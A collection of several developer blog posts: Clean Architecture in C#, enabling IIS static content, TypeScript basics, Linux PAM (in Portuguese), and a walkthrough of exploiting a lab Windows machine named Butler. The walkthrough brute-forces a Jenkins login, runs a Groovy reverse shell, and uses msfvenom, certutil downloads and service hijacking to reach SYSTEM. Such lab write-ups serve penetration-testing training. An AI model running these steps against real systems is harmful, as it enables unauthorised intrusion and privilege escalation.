`IUserRepository`: An interface for accessing user data from the database. - `IPasswordHasher`: An interface for hashing passwords securely. The `RegisterUser` use case will follow these steps: 1. Validate input data 2. Check for existing `User` 3. Hash the password 4. Create a new `User` entity 5. Save the `User` to the database 6. Return the result Finally, here's the code for our `RegisterUser` use case: ```csharp public class RegisterUser( IUserRepository userRepository, IPasswordHasher passwordHasher) { public async Task<RegistrationResult> Handle(RegistrationRequest request) { // Validation omitted for brevity if (await userRepository.ExistsAsync(request.Email)) { return RegistrationResult.EmailNotUnique; } var passwordHash = passwordHasher.Hash(request.Password); var user = User.Create( request.FirstName, request.LastName, request.Email, passwordHash); await userRepository.InsertAsync(user); return RegistrationResult.Success; } } ``` A big benefit of this approach is that we can immediately write tests for the `RegisterUser` use case. We can provide mocks for external dependencies in the tests. We don't need the implementations to exist for this code to compile. With mocks, we can test our business rules and validate our implementation. **Action step**: How would you extend the `RegisterUser` use case with more functionality? Here are two examples: - Adding an external identity provider - Implementing email verification ## Where Clean Architecture Becomes Muddled By designing our application with Clean Architecture, we produce a system independent of external concerns. We define abstractions in the Application layer and implement them in the Infrastructure layer. So far, so good. However, this doesn't mean you can disregard how you integrate with external dependencies. In theory, we should be able to "swap" the implementation for any external concern and call it a day. In practice, this couldn't be further from the truth. Let me give you two practical examples using the user registration flow. ### Race Conditions The `RegisterUser` use case has a race condition. Concurrent requests could pass the check for email uniqueness and proceed to register the user. We could prevent this race condition by introducing a lock before checking for email uniqueness. That way, only one request will pass the check and proceed to save the user in the database. ```csharp if (await userRepository.ExistsAsync(request.Email)) { return RegistrationResult.EmailNotUnique; } ``` However, there is a much more elegant way to solve this. We can introduce a unique index on the `Email` column in the database. A unique index guarantees that only one transaction can write the unique value to the database. The losing transaction will return an error. We can handle this exception on the application side and return an appropriate error message to the user. The `IUserRepository.InsertAsync` method implementation can encapsulate this logic. ### Changing Hash Functions Let's say we found a security flaw in the hash function used in the `IPasswordHasher` implementation. So, we spend a few minutes switching to a more secure hash function. The tests for the `RegisterUser` use case are all green, and everything seems fine. The problem? All existing users can no longer log in to the system. When an existing user tries to log in with their email and password, the new `IPasswordHasher.Hash` implementation returns a different password hash from the one stored in the database. The correct approach is to phase out the old password hash for existing users. We can add a column in the database that says which hash function produced the hash. We will verify the user's password using the correct hashing function during the login process. If the user's password hash still uses the old hashing function, we will verify their password first. Then, we can use the password (which we have in memory) to produce a hash using the new hash function. We will store the hash in the database and update the hash function column to the new algorithm. Slowly, we will phase out passwords using the old hash function. ## Conclusion I hope this was helpful in understanding how to apply Clean Architecture principles to a real-world scenario. By focusing on the core business logic first (what it means for a user to register), we can define the requirements for our use case. Translating these requirements into a series of steps within the use case is the easy part. But Clean Architecture won't save you from bad engineering. If you don't understand what you are abstracting away, it will become a problem in the long term. If you want to go deeper, my flagship course, [**Pragmatic Clean Architecture**](https://www.milanjovanovic.tech/pragmatic-clean-architecture), takes the guesswork out of structuring your project the right way. I share my entire framework for building robust applications from the ground up - from building a rich domain model to creating use cases to getting your application ready for production. And that's all for this week. See you next Saturday. * * * **P.S. Whenever you're ready, there are 3 ways I can help you:** 1. [**Pragmatic Clean Architecture:**](https://www.milanjovanovic.tech/pragmatic-clean-architecture?utm_source=dev.to&utm_medium=website&utm_campaign=cross-posting) Join 2,900+ students in this comprehensive course that will teach you the system I use to ship production-ready applications using Clean Architecture. Learn how to apply the best practices of modern software architecture. 2. [**Modular Monolith Architecture:**](https://www.milanjovanovic.tech/modular-monolith-architecture?utm_source=dev.to&utm_medium=website&utm_campaign=cross-posting) Join 750+ engineers in this in-depth course that will transform the way you build modern systems. You will learn the best practices for applying the Modular Monolith architecture in a real-world scenario. 3. [**Patreon Community:**](https://www.patreon.com/milanjovanovic) Join a community of 1,050+ engineers and software architects. You will also unlock access to the source code I use in my YouTube videos, early access to future videos, and exclusive discounts for my courses.
milanjovanovictech
1,921,462
How to Enable Static Content Service in IIS in Windows 11?
Static Content Service in Internet Information Services: The Static Content Service in...
0
2024-07-17T16:01:19
https://winsides.com/enable-static-content-service-iis-windows-11/
tips, beginners, tutorials, windows11
--- title: How to Enable Static Content Service in IIS in Windows 11? published: true date: 2024-07-05 15:55:00 UTC tags: tips,beginners,tutorials,windows11 canonical_url: https://winsides.com/enable-static-content-service-iis-windows-11/ cover_image: https://winsides.com/wp-content/uploads/2024/01/Enable-Static-Content-in-Windows-11.jpg --- ## Static Content Service in Internet Information Services: The Static Content Service in Internet Information Services (IIS) on Windows 11 is designed to optimize the delivery of static content on websites. Static content typically includes elements like images, stylesheets, JavaScript files, and other resources that don’t change frequently. This guide delves into the world of Static Content Service in IIS on Windows 11, unveiling how it transforms your web server into a powerhouse for rapid content delivery. Join us as we explore how this service enhances website performance, accelerates page loading times, and ensures a **seamless, user-centric browsing experience**. ## How to Enable Static Content Service IIS in Windows 11: 1. Click on the **Start Menu** and open the **Control Panel**. 2. Switch the Control Panel view to **Category**. ![Category View](https://winsides.com/wp-content/uploads/2024/01/Category-View-1024x499.jpg "Enable Static Content Service in IIS in Windows 11 61") _Category View_ 3. Now, Click on **Programs**. ![Programs](https://winsides.com/wp-content/uploads/2024/01/Programs-1024x484.jpg "Enable Static Content Service in IIS in Windows 11 62") _Programs_ 4. Under Programs and Features, click on **Turn Windows Features on or off**. ![Turn Windows Features on or off](https://winsides.com/wp-content/uploads/2024/01/Turn-Windows-Features-on-or-off-1024x443.jpg "Enable Static Content Service in IIS in Windows 11 63") _Turn Windows Features on or off_ 5. **Windows Features** dialog box will open now. 6. From the list of services available, search and locate **Internet Information Services**. 7. Click on the checkbox next to the Internet Information Services and then click on **OK**. ![Turn on Internet Information Services](https://winsides.com/wp-content/uploads/2024/01/Turn-on-Internet-Information-Services.jpg "Enable Static Content Service in IIS in Windows 11 64") _Turn on Internet Information Services_ 8. Click the **plus sign (+)** next to the Internet Information Services to expand the list. ![World Wide Web Services IIS](https://winsides.com/wp-content/uploads/2024/01/World-Wide-Web-Services.jpg "Enable Static Content Service in IIS in Windows 11 65") _World Wide Web Services IIS_ 9. Now, expand **World Wide Web Services** , and expand **Common HTTP Features**. ![Common HTTP Features](https://winsides.com/wp-content/uploads/2024/01/common-http-features.jpg "Enable Static Content Service in IIS in Windows 11 66") _Common HTTP Features_ 10. Click on the checkbox next to **Static Content** , and click **OK**. ![Static Content Windows 11](https://winsides.com/wp-content/uploads/2024/01/Static-Content.jpg "Enable Static Content Service in IIS in Windows 11 67") _Static Content Windows 11_ 11. 12. 13. The system will prompt for a restart. Continue with **Restart now**. It is recommended that changes made to the system reflect while using the environment. Click **Close**. ![Close](https://winsides.com/wp-content/uploads/2024/01/Close.jpg "Enable Static Content Service in IIS in Windows 11 70") _Close_ 14. That is it, Static Content Service IIS is now enabled on your Windows 11 laptop or PC. Enjoy Seamless Connectivity. **Note** : To turn on the Individual components of IIS Windows 11, make sure that IIS is already enabled. ### Significant Features of Static Content Service IIS: - Efficient Content Delivery - Caching Mechanisms - Bandwidth Optimizations - Parallelized Downloads - Gzip Compression - Improved User Experience > Elevate your website’s performance, engage your audience, and make a lasting impact with the Static Content Service in IIS on Windows 11.
vigneshwaran_vijayakumar
1,921,495
Exploring TypeScript: A Comprehensive Guide
TypeScript enhances JavaScript by adding static types, which can improve code quality and development...
28,050
2024-07-13T05:25:00
https://dev.to/jakaria/exploring-typescript-a-comprehensive-guide-36nk
typescript, programming, webdev, learning
TypeScript enhances JavaScript by adding static types, which can improve code quality and development efficiency. This guide covers key TypeScript features including data types, objects, optional and literal types, functions, spread and rest operators, destructuring, type aliases, union and intersection types, ternary operator, optional chaining, nullish coalescing operator, and special types like never, unknown, and null. #### 1. Data Types TypeScript provides a variety of basic types, ensuring variables hold values of specified types: ```typescript let isDone: boolean = true; // boolean type let age: number = 30; // number type let name: string = "John Doe"; // string type let list: number[] = [1, 2, 3, 4]; // array of numbers let user: [string, number] = ["Alice", 25]; // tuple type, fixed length array with specified types ``` By specifying data types, you can catch type-related errors early, making your code more predictable and reducing bugs. #### 2. Objects Objects in TypeScript can have specified property types, making it clear what properties an object should have: ```typescript let person: { name: string; age: number } = { name: "Alice", age: 25 }; ``` This ensures that the object `person` always has `name` as a string and `age` as a number. Attempting to assign an incorrect type will result in a compile-time error. #### 3. Optional and Literal Types Optional properties and literal types add more flexibility and specificity: ```typescript let optionalPerson: { name: string; age?: number } = { name: "Bob" }; // age is optional type Color = "red" | "green" | "blue"; let favoriteColor: Color = "green"; // can only be one of the specified values ``` Optional properties allow for more flexible object structures, and literal types limit a variable to specific values, ensuring only predefined values can be assigned. #### 4. Functions TypeScript allows type definitions for function parameters and return types, making functions easier to understand and use: ```typescript function greet(name: string): string { return `Hello, ${name}`; } let greeting: string = greet("Alice"); // returns "Hello, Alice" ``` This ensures that the `greet` function always takes a string and returns a string. If you pass an argument of a different type, TypeScript will throw an error. #### 5. Spread and Rest Operators Spread and rest operators help manipulate arrays and objects efficiently: ```typescript let numbers: number[] = [1, 2, 3]; let moreNumbers: number[] = [...numbers, 4, 5]; // spreading the numbers array function sum(...values: number[]): number { // rest parameter return values.reduce((acc, val) => acc + val, 0); } let total: number = sum(1, 2, 3, 4); // returns 10 ``` The spread operator allows expanding arrays/objects into individual elements, and the rest operator gathers multiple arguments into an array. #### 6. Destructuring Destructuring simplifies extracting values from arrays and objects: ```typescript let [first, second] = [1, 2]; // array destructuring let { name, age } = { name: "Charlie", age: 28 }; // object destructuring ``` Destructuring makes it easier to work with complex data structures by breaking them into simpler parts, allowing for cleaner and more readable code. #### 7. Type Aliases Type aliases create custom types, making the code more readable and reusable: ```typescript type Point = { x: number; y: number }; let point: Point = { x: 10, y: 20 }; ``` Type aliases provide a way to name complex types, improving code clarity and making it easier to understand what types are expected. #### 8. Union and Intersection Types Union types allow variables to hold multiple types, while intersection types combine multiple types: ```typescript type Id = number | string; // union type let userId: Id = 123; // can be a number userId = "ABC"; // or a string type Employee = { name: string } & { age: number }; // intersection type let employee: Employee = { name: "Dave", age: 30 }; ``` Union types are flexible, allowing a variable to hold values of different types, and intersection types ensure objects meet multiple type requirements, providing more control over the structure of the data. #### 9. Ternary Operator The ternary operator provides a shorthand for conditionals: ```typescript let age: number = 18; let isAdult = age >= 18 ? "Yes" : "No"; // if age is 18 or more, isAdult is "Yes"; otherwise, "No" ``` The ternary operator is a concise way to write simple conditional expressions, making the code shorter and more readable. #### 10. Optional Chaining and Nullish Coalescing Operator Optional chaining and nullish coalescing handle null and undefined values gracefully: ```typescript let user = { address: { street: "123 Main St" } }; let street = user?.address?.street; // safely access nested properties let input = null; let value = input ?? "default"; // returns "default" if input is null or undefined ``` Optional chaining prevents runtime errors when accessing nested properties that might not exist, and nullish coalescing provides default values for null/undefined, ensuring the code behaves as expected even with missing values. #### 11. Special Types: Never, Unknown, and Null TypeScript has special types for specific use cases: ```typescript function error(message: string): never { // never indicates a function never returns throw new Error(message); } let unknownValue: unknown = "hello"; // unknown type requires type assertions before use let valueLength: number = (unknownValue as string).length; let nullableValue: null = null; // null type ``` - `never` represents unreachable code or a function that never returns. - `unknown` is a type-safe counterpart of `any`, requiring explicit type assertions before use. - `null` explicitly allows null values, indicating the absence of any value.
jakaria
1,921,497
BUTLER MACHINE EXPLOIT WALKTHROUGH
This walkthrough will showcase a creative approach in exploiting a windows machine named butler and...
0
2024-07-13T00:03:01
https://dev.to/babsarena/butler-machine-exploit-walkthrough-5cfb
This walkthrough will showcase a creative approach in exploiting a windows machine named butler and gaining access on the machine. After successfully setting up your butler windows machine, use the following details to login to the machine. **butler: JeNkIn5@44 administrator: A%rc!BcA!** We can login using the administrator password **A%rc!BcA!** so as to get the IP address of our butler windows machine. After successful login to our windows machine, we open the **command prompt** and input the command below to get our IP address: ``` ipconfig ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tbz8ktl5jzysochdrx22.png) From the image above, my IP address is **"192.168.182.142"** We can start by pinging our windows machine from our kali using the command: ``` ping 192.168.182.142 -c3 ``` to make sure both machines are communicating ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yccbh0s0cvl6klaltz9u.png) The next step now is to run an Nmap scan using the command: ``` nmap -p- -A 192.168.182.142 ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7tcex2w8prypxkk91dyt.png) From the above image we can see that port 8080 is open which is using http service, so the next step is to visit the website on our browser using: ``` 192.168.182.142:8080 ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/irky84yiot9dsyzoll0c.png) We landed on a jenkins login page. After much enumerations I couldn't find anything, so I searched the web for jenkins default password. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/29hc0jt104zjrb3bijvt.png) So I tried using the default password and it still failed. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fybojcjcni7e4c9zmisg.png) So the next thing left for me now is to try a brute force attack and for that I want to use metasploit. So we open a new tab on our kali and input the command below to turn on metasploit: ``` msfconsole ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q31i4t60zm2zzovje7yl.png) So next, we search the word jenkins using the command: ``` search jenkins ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nqhlhjkz9xmgfwdqp5v0.png) For me on number 19, it's showing me a jenkins login with the details **"19 auxiliary/scanner/http/jenkins_login"** NB- your own jenkins login number might be different, so make sure to use the jenkins login number of yours. So next, I input the command: ``` use 19 ``` Then I input the command: ``` options ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g7do41gpwhstmylzwtzs.png) My idea is to use rockyou.txt wordlist for both the username and password but it will take hours if not days for the brute force attack to be complete. So for the options set the following parameters by inputting the command: ``` set username jenkins ``` ``` set pass_file /usr/share/wordlists/rockyou.txt ``` ``` set user_as_pass true ``` ``` set stop_on_success true ``` ``` set rhosts 192.168.182.142 ``` NB- So basically, what I am trying to do is use the username jenkins as a trial and see if it will have a successful login using the password file of rockyou.txt. In a case where there's no username to try we can use rockyou.txt for the username file but like I said the attack would take hours if not days to be successful, so to make you get the password on time, make sure to set the username as jenkins. Now input the command: ``` options ``` to make sure all what was set has been properly set and is reflecting. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5yn5fi7j1ein8uc10cwn.png) Now input the command below to run the exploit: ``` run ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zgydvl8k4tts8q37yu5r.png) After successfully running the exploit, we can see from the output that the username and password for the jenkins website is **jenkins:jenkins** So both the username and password are the same. - I'd also like to show you how to use burp-suite for a brute-force attack. ## HOW TO USE BURP-SUITE FOR BRUTE FORCE ATTACK -Search for foxyproxy extension on your firefox browser on kali and then add it to your extension ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5dghyn3l9ifredxb7o6q.png) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4jzo38960gmvlpav019i.png) - Click on the extension, right click and select the manage extension option ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u1f5nlc5en0s7pn7l3dr.png) - Click on proxies and then add - Now set the title, type, hostname and port as seen in the image below and then save ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/98u8mt6uhfoampihd8p3.png) Now once you have visited the jenkins login page, make sure your foxyproxy extension is switched on. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z5q0m5i42nt01er7dzdn.png) - Now search for burpsuite on your kali and open it ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lmhkvwzzdr7l6glk9oss.png) - Press next ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fpkvnirdi0xmnqnsj4o6.png) - Start burp ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ewx3ladusiftcthx9aaf.png) - Click on proxy and set intercept to on ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zb3rzilxm6s9b51w9t80.png) - Remember to make sure that foxyproxy extension is on -Now input a wrong username and password for the jenkin login ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yhligxzeblda40dyygqi.png) It will take you straight to burp and show you a page as seen below ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9g0knhjcp1hpqiz9xutp.png) - right click and then send to repeater and also send to intruder ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/axex1240g7ibgqqnf8iv.png) - From repeater you can easily change the username and password and then click on send to know if the details are corrected but doing this with repeater will take time. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jw2s7jipylgs5zoufu9z.png) - So now we switch to intruder ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oquh8ctcisomrnsx6rbm.png) - Next we double click on the username hacker and the click on add - Then we double click on the password hacker and the click on add ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kxj9jjavw91ocg2en0zv.png) It has shown us from the image that we have highlighted two position/options that we would like to change - Next we switch out attack type to cluster bomb because we want to try all the usernames with all the passwords ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6zz7n2wdbidlt9fc57ar.png) - Now click on payload ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bvk6l6cz22gv6taa7s5t.png) what we are trying to do is to guess some usernames and passwords that we would like to use for a brute force attack - So we input them as seen in the image below and click on add and keep adding as much as we want to. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bwxersv1n1lv04prvphc.png) - Then we switch to 2 as seen in the image below and input the passwords we would like to try. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iaoiqbj8r1ezoahn4zm8.png) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f47o6hfh9b1aaxxenx0o.png) - Click on start attack ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xbnqsc81zqundhpmoaff.png) - Notice how from the response we got the status code is the same but what we are mainly focusing on is the length and from the image below we can see a big difference in the length for jenkins-jenkins, because the length difference gives us an indication that there's something different, so we try the username and password on the jenkins page. NB- make sure to turn off your burp-suite and foxyproxy Now we go back to our jenkins login page and input the username and password **jenkins** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lwz7v59cmn2nuoehor0p.png) we have successfully logged in. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u28l7vt8xuhabbee003i.png) Now we are trying to find a place to run code execution . For that click on manage jenkins ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lgxuil6u5ppk01psmfff.png) And then click on script console ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aukkfjwkuzkzwdhq7fbk.png) The script console seems to be in groovy ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qpvl9l8yu9lt5ddz4n81.png) Search google for groovy reverse shell and select the one from github as seen in the image below ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o74gnwkw29ab0zbn6bfv.png) Now click on raw and copy all ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ewot64t0xldwodqwlmxa.png) Now paste it script console ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uglrp8unhl9sv18z73qu.png) Since the reverse shell script wants to use port 8044 so we set up a listener using the command: ``` nc -nvlp 8044 ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ntncf598tc6grsjiawet.png) Now we need to change the local host to our attacking machine's IP address ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zbqz9ys1d0p0a0yc00yz.png) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nphqpeg368yt929iub05.png) Now click on the run ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kdbeinq505ipx5rkubhp.png) We have successfully popped a shell ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wu6q2ev67m28l32c8w19.png) Input the command below to find out who we are on the system ``` whoami ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y0zs7lum8m2smej39wiw.png) From the image above, we can see that we are butler and we are not system admin, so we would need to do some privilege escalation. For this we would use a tool called **winpeas** It is a privilege escalation tool for windows. Search google for winpeas ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hwuf6kpul83sqbv0vkqr.png) select the one as seen in the image above Then select the winpeasexe file ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3rz3r1r7t4k5v8vatgm0.png) Scroll down and click on download the latest ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8sja68qurguikobf9y84.png) Click on winpeasX64 ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cz7b1pu26dq0knxjpegf.png) Once you have successfully downloaded it, it should be in your downloads directory. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o8ep8yggk64k3eutimxc.png) Now that it has been successfully downloaded, we need to host up a web server and then get the file from our shell we popped To do that , input the command below in your downloads directory: ``` python3 -m http.server 80 ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9hjmkav2kr60wb3h8wlg.png) Then on our tab which we popped a shell, we need to go into a directory we know that we have read and write permission. So input the command: ``` cd c:\users ``` Input the command; ``` dir ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p4yqadxpsa3xxrf3c5pl.png) Now input the command: ``` cd butler ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vpabhx7ji997bcwlnlti.png) Now we would put winpeas here because it is butler's base directory and we should have a higher permission for this directory. So to put the file here, input the command; ``` certutil.exe -urlcache -f http://192.168.182.129/winPEASx64.exe winpeas.exe ``` The file should have successfully downloaded and be named as winpeas.exe on the windows system Input the command below to find the file: ``` dir ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pygz5isxpmhazr0iq07d.png) Now we need to run winpeas and to do that we input the command: ``` winpeas.exe ``` For this particular exploit, we are interested in finding out which services are running on the system, so scroll down to **service information** found from winpeas ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lvllxyxof44o55jkdlw2.png) The image above shows some of the services running on the butler windows machine. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ho6b52tl51czj5qpd0r.png) Out of all the services running, the wiseboot is the one we are interested in. The next step now is to generate some malware, we can use metasploit to do that but for this exploit we would be doing it manually using the command: ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.182.129 LPORT=7777 -f exe > wise.exe ``` NB- Make sure to change the LHOST to your kali's IP address. Once the malware has been generated we need to host up a web server and receive it on our windows tab in which we popped the shell ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/st6mirdhl9l6kz8udud0.png) The image above shows that I generated the malware on my Downloads directory, so I would host up the web server there using the command: ``` python3 -m http.server 80 ``` NB- Make sure you have cancelled the web server we were previously hosting. Use **Crtl C** to cancel the previous one if you haven't And if yours is still being hosted from the first time we hosted it and you do not wish to cancel, then do not cancel, just do not re-host it and then just input the command to receive the wise.exe file on the windows machine. Next we need to open up a new tab and then listen on port 7777 because that is the port we plan on using for the exploit and for that we use the command: ``` nc -nvlp 7777 ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zgvy9o8ldd8l8xsluxff.png) Now we need to cd into the wise directory, so for that input the command: ``` cd c:\ ``` ``` dir ``` Then we need to go into the program file x86 directory, so input the command: ``` cd Program Files (x86) ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wyin3je2lio3uaq10zfd.png) Now cd into wise using the command: ``` cd Wise ``` Now we want to put the wise.exe file here, so we input the command: ``` certutil -urlcache -f http://192.168.182.129/wise.exe wise.exe ``` Once it has been successful, input the command: ``` dir ``` to confirm ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f8woavxo2nhf177im4hr.png) We need to first stop the service that's running as wisebootassistant, because if we don't, we might pop a shell back as butler instead of system admin, so to stop the service, input the command: ``` sc stop wisebootassistant ``` To confirm that the service has stopped, input the command: ``` sc query wisebootassistant ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bike3wgkw54ljyzo1xyo.png) Now we need to start it using the command: ``` sc start wisebootassistant ``` We have successfully popped a shell as system. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cplkia9h12l8nypbl6s0.png) Input the command below to confirm: ``` whoami ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2ez9fr1vjnobortgyryk.png) and input the command below to get the system info: ``` systeminfo ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qkyb830f8xp7s1iessff.png) ## MAJOR PROBLEM YOU MIGHT FACE WHILE EXPLOITING THIS MACHINE For some reasons the machine would keep shutting down so whenever it shuts down, make sure to turn it back on. GOODLUCK!!!
babsarena
1,921,505
Usando PAM no Linux
O que é? Bem, vamos primeiro falar sobre o que são os PAM, Plugglable Autentication...
0
2024-07-12T21:00:23
https://dev.to/rafaelbonilha/usando-pam-no-linux-lp4
linux, security, logicapps, systems
#O que é? Bem, vamos primeiro falar sobre o que são os **PAM**, **Plugglable Autentication Modules** que são um conjunto de bibliotecas usadas para fazer autenticação, gerenciamento de contas, controle de recursos dos usuários no sistema, em adição ao tradicional sistema de acesso baseado em usuários/grupos, isto é, para todos os recursos que suportam ele é claro. Criados em 1997, eles estão disponíveis desde então para GNU/Linux e UNIX. Em quase todos os casos de autenticação, o PAM está envolvido. Normalmente não fazemos interações diretamente nos arquivos de configuração do PAM, tendo outros aplicativos fazendo as alterações nele por você. A seguir mostraremos como saber se um aplicativo suporta PAM. #Como saber se um aplicativo suporta PAM?# Basta digitar o comando ldd programa, por exemplo.: ``` ldd /bin/login ``` Se listar a biblioteca *libpam*, o programa possui suporte a PAM compilado. Se não for listada, o programa precisará ter seu código fonte alterado para poder tratar os módulos de autenticação que compõem o PAM. Importante lembrar que deverá recompilar o programa após as alterações para que ele possa estar utilizando os recursos do PAM. A maioria dos módulos compartilhados do PAM são encontrados no arquivo de autenticação do sistema para autenticação local e no arquivo de autenticação de senha para o cenário que o aplicativo escuta em conexões remotas, sendo estes arquivos encontrados em */etc/pam.d*. # Políticas no PAM# A política padrão no PAM é especificada em */etc/pam.d/other* e ela será aplicada se não tiver nenhum outro arquivo de controle em */etc/pam.d*. A política padrão é criada usando o módulo *pam_unix.so*, para criação e implantação de políticas mais restritivas é recomendado alterar em /etc/pam.d/other. Os bloqueios são aplicados através do módulo *pam_deny.so* e os alertas de logs são enviados ao syslog pelo módulo *pam_warn*. Esses alertas são úteis em situações onde o módulo PAM que necessitem do serviço de autenticação sejam bloqueados por uma política criada, lembrando que o módulo pam_deny.so não bloqueia automaticamente. Por isso é recomendável usar o pam_warn na configuração de políticas de autenticação mais restritivas de forma a verificar possíveis bloqueios indevidos. # Principais Módulos do PAM A seguir iremos listar os principais módulos do PAM. **/etc/security** Este módulo possui uma coleção de arquivos de configuração para módulos específicos, muito usado pelas aplicações que suportam PAM. **/var/log/secure** Este é o arquivo de log onde a grande maioria dos erros de autenticação e segurança são inseridos, é nele que são exibidas as políticas de restrição. **/usr/lib64/security** São uma coleção de bibliotecas PAM que executam várias verificações de autenticação. **/etc/pam.d** É neste lugar que ficam os arquivos que os aplicativos utilizam para validar a autenticação. Neles são definidos quais módulos são verificados, usando quais opções e em qual ordem. Eles podem ser adicionados no sistema ao instalar um aplicativo compatível e são editados por outros aplicativos com suporte a PAM via libpam. Agora vamos ver um caso de uso do PAM, de forma a trazer mais segurança a um sistema Linux. #Restrigir Acesso ao Root usando su Para restringir a um número limitado de usuários que façam parte de um grupo criado especificamente para esse fim o acesso ao root com o comando **su**. A restrição irá funcionar mesmo que o usuário digite a senha correta do usuário root, onde ele receberá uma mensagem de senha ou login incorretos. Para fazer isso, siga os passos a seguir.: ✔ Crie um grupo para os usuários que terão o acesso de root. ✔ Altere o arquivo **/etc/pam.d/su**. Coloque a linha abaixo (caso não exista) no arquivo de configuração: ``` auth required pam_wheel.so group=nomedogrupocriado ``` O que essa linha faz é usar o módulo **pam_wheel.so**, solicitando que os usuários pertençam ao grupo criado. Salve e saia do editor. ✔ Ainda como usuário root, adicione os usuários no grupo, uma dica importante: **Adicione o seu usuário primeiro, principalmente se estiver acessando o sistema remotamente**. Isto irá impedir em caso de perda de conexão, que o seu usuário seja atingido pela política de restrição criada. ✔ Teste com outros usuários que tenham a senha de root e não estão no grupo criado para validar se as alterações foram aplicadas corretamente. Assim mostramos um pouco do que o PAM pode fazer para melhorar o nível de segurança e autenticação em Sistemas Linux/Unix. Seus módulos permitem um ambiente muito mais robusto que os serviços por aplicativos podem fornecer para autenticação, por isso sua longevidade dentro do ecossistema Linux, estando disponível e sendo usado a mais de 20 anos. **Referências para o Post.:** https://www.ibm.com/docs/pt-br/netcoolomnibus/8.1?topic=authentication-pam-unix-linux https://www.redhat.com/sysadmin/pluggable-authentication-modules-pam https://github.com/linux-pam/linux-pam https://www.ibm.com/docs/pt-br/spss-statistics/29.0.0?topic=authentication-configuring-pam https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules https://www.linuxfromscratch.org/blfs/view/11.1/postlfs/linux-pam.html https://www.guiafoca.org/guiaonline/seguranca/ch06s02.html
rafaelbonilha
1,921,523
JavaScript to TypeScript in React-Native Development
TypeScript in React Native: My Journey from Confusion to Clarity After a year of working...
0
2024-07-16T16:55:14
https://dev.to/rafi_barides_faa6677ba16d/javascript-to-typescript-in-react-native-development-4hd7
typescript, reactnative, mobile
